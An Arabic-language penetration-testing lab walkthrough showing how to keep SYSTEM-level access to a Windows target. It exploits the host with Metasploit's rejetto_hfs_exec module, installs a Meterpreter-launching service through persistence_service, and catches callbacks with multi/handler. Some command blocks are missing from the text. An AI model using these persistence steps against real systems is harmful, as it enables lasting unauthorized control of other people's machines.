🧪 1. الحفاظ على وصول Windows عبر خدمة (Maintaining Access – Persistence Service Lab)
🎯 الهدف الأساسي: إنشاء خدمة دائمة على نظام Windows مستهدف لضمان بقاء الوصول، وذلك بإنشاء خدمة جديدة تقوم بتشغيل Meterpreter payload يتصل بمستمع على Kali Linux.
🔧 الأدوات المستخدمة:
Nmap
Metasploit Framework (MSFConsole)
exploit/windows/http/rejetto_hfs_exec(Metasploit module)Meterpreter commands:
getuid,background,sessionsexploit/windows/local/persistence_service(Metasploit Post-Exploitation module)exploit/multi/handler(Metasploit module)Windows Command:
reboot(للمحاكاة)
📜 خطوات التنفيذ:
📊 أولاً: الاستطلاع والفحص والاستغلال والحصول على صلاحيات Administrator (Reconnaissance, Scanning, Exploitation & Privilege Escalation) 🗣️ إذا كررت عملية الاستطلاع والفحص والاستغلال (Nmap، Metasploit، rejetto_hfs_exec) كما في اللابات السابقة.
فسوف تحصل على جلسة Meterpreter على النظام المستهدف.
للتحقق من صلاحياتك (يجب أن تكون Administrator أو SYSTEM):
getuidفسوف يعرض لك أنك داخل بصلاحيات Administrator. (ملاحظة: يتطلب هذا الموديول صلاحيات Administrator أو SYSTEM).
📊 ثانياً: إعداد Persistence عبر خدمة (Post-Exploitation - Persistence)
لو وضعت جلسة Meterpreter في الخلفية:
backgroundفسوف تخرج إلى موجه Metasploit الرئيسي.
لو استخدمت موديول
exploit/windows/local/persistence_serviceلإنشاء خدمة دائمة:use exploit/windows/local/persistence_service set LPORT 4433 # استخدام منفذ مختلف عن المنفذ الأصلي للجلسة set SESSION 1 # افترض أن رقم الجلسة 1 exploitفسوف يقوم الموديول بإنشاء ورفع ملف تنفيذي (executable) إلى النظام المستهدف، ثم يقوم بإنشاء خدمة جديدة على Windows لتشغيل هذا الملف. سوف تحصل على جلسة Meterpreter جديدة (غالباً بصلاحيات SYSTEM).
للتحقق من الجلسات المفتوحة:
sessionsفسوف ترى جلستين: الجلسة الأصلية (Administrator) والجلسة الجديدة (SYSTEM).
📊 ثالثاً: إعداد مستمع دائم على Kali Linux (Post-Exploitation - Persistence)
لو فتحت
msfconsoleجديدة في New Tab.لو استخدمت موديول
exploit/multi/handlerوإعداده:فسوف ينتظر المستمع اتصالات من الخدمة الدائمة.
📊 رابعاً: التحقق من Persistence (Post-Exploitation - Persistence)
لمحاكاة إعادة تشغيل النظام المستهدف (من الجلسة Meterpreter الأصلية):
فسوف يعيد النظام المستهدف التشغيل.
على Kali Linux (في Terminal المستمع):
بعد إعادة تشغيل النظام المستهدف، فسوف تستقبل جلسة Meterpreter جديدة.
للتحقق من الصلاحيات في الجلسة الجديدة:
فسوف يعرض لك
NT AUTHORITY\SYSTEM.
💡حتى لو تم إغلاق الجلسة الجديدة أو الأصلية، فسوف يستمر المستمع في تلقي جلسات جديدة طالما أن الخدمة الدائمة تعمل على النظام المستهدف.
تنظيف الآثار: موديول
persistence_serviceيولد ملفcleanup.rc، يمكن تشغيله لإزالة الخدمة والملفات التي تم إنشاؤها.
✅ نقاط التحقق:
الحصول على جلسة Meterpreter بصلاحيات Administrator.
🔑 نجاح إنشاء خدمة Persistence باستخدام
exploit/windows/local/persistence_service.🔑 إعداد
multi/handlerعلى Kali للاستماع.🔑 تلقي جلسة Meterpreter جديدة بصلاحيات SYSTEM بعد إعادة تشغيل النظام المستهدف.
Last updated

